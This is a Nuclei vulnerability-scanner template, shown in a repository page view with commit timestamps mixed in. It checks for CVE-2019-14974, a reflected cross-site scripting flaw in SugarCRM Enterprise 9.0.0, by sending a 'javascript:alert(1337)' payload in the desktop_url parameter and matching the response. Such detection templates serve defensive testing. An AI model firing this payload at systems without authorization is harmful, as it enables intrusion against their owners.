nuclei-templates/cves/CVE-2019-14974.yaml

20 lines
410 B
YAML
Raw Normal View History

2020-04-08 12:49:45 +00:00
id: CVE-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers:
- type: status
status:
- 200
2020-04-08 13:20:23 +00:00
- type: word
2020-04-08 13:24:36 +00:00
words:
2020-04-08 12:49:45 +00:00
- "1337"
part: body